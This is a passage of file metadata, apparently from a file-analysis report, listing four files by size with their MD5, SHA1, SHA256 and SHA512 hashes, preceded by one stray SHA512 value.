SHA512516191548c77eca021d07886a811f2fa6fc4be4f0321d5d61c1452cb22606877349a2dc80b03725f6e18fc0ce2524b0040baa6bdbabb40e9342da4401aa6e509
-
Filesize
102KB
MD578c772ea162b97132c3b76f6c313d326
SHA1d45f7fc473e9e47185541bff467721386245e8e6
SHA256a621a97a08419ab7d35eecb70ae4a9f8849f621101821ca84df3886252ace701
SHA512fde9dc70c6cc6fa518a81cf52fe4bcba66c54afeb8986644dfa700bc1c9766f3d51160ebc7b2eb98c50c99a26b3caea541783b59d1bb208d8746f96121a70a00
-
Filesize
306B
MD550615ad6e26d96511b53202a444c5adf
SHA15bd5689ac12e87808368ca533ac37de5e87a5572
SHA2569d9de6a1533d670579c5ef30d6ec10792da69ea28cf2db0589549668ee5b5e5b
SHA512815b123082890500949a2d90d67e9d202f02a03b112aedb71ca28efcf92d6e28b8ce49034f3111cf8e5eeb3296f381911be3835538f3928ead826af632400741
-
Filesize
437B
MD59ed1c2ba0b84e3f738ead207c7035a35
SHA1493f92e391ccf01c25c53e11a1b793240e79f5f6
SHA25604195b12cd1400e8252bead74661e3384632a0bbcea5d8c52f8e0635bdc3919d
SHA512705d28611e2f551e51df9e60b99c189244c4798674b9d114fbf3072a30418c8783bd1a7ee0991439e8b02ec9480d3848840299151bb2b86f328a7c08a08e12bc
-
Filesize
568B
MD5fa18d8ddc32b949074f8e5955ee746e0
SHA166bf6733f867d38bf1506f2fcf730444c6eacee2
SHA25652c9e4b1a2d1ca0b4de5f5f4cce9aa98ec17b37a49ed2fc1842bb78937765dc9
SHA512a6a8017f1050d8f03eea7cf66522c39d64661c4d44c1642317c8ebf20d20c7d8e9f47e45bf01d512323195150cbee0dc3dd8da4bf90735b273a64eddaebc85ac